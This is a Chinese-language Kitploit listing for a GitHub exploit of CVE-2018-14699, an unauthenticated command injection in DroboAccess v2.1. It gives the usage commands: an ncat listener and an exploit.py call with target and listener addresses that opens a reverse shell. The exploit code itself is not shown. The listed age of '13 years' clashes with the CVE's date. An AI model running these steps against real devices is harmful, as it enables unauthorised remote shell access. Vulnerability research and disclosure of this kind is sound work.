Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-14699 — DroboAccess v 2.1 的 enable_user 函数中存在未认证的盲命令注入 | Kitploit
工具/GitHubGitHub/revocain/cve-2018-14699
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubrevocain/cve-2018-14699

CVE-2018-14699

DroboAccess v 2.1 的 enable_user 函数中存在未认证的盲命令注入

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-14699

DroboAccess v2.1 中 enable_user 函数的无认证命令注入


使用方法:

  • 首先启动一个监听器(ncat -nvlp 1337)

  • 然后运行漏洞利用脚本

    • 示例:exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='用于利用的主机,例如 192.168.1.122:8080', required=True

    '-l', '--listener-ip', help='监听器 IP', required=True

    '-p', '--port', help='监听器的端口号', required=True

描述:

CVE-2018-14699 是 DroboAccess v2.1 中的一个盲目命令注入漏洞。问题出在 enable_user 函数将用户名参数作为用户输入,然后调用了一个直接执行 shell 的依赖,且没有任何清理操作。我澄清这一点,因为似乎在其他地方没有对此的引用。所以再次强调,这不是 Drobo 5N2 的漏洞,而是 DroboAccess 的漏洞。已在 B810n 上测试成功。

详情

该脚本会尝试将一个脚本回显到当前工作目录下名为 revshell 的文件中。如果成功,它将尝试用 bash 作为可执行文件调用该脚本,从而使用 bash 向你监听器建立反向连接!

资源:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
下载工具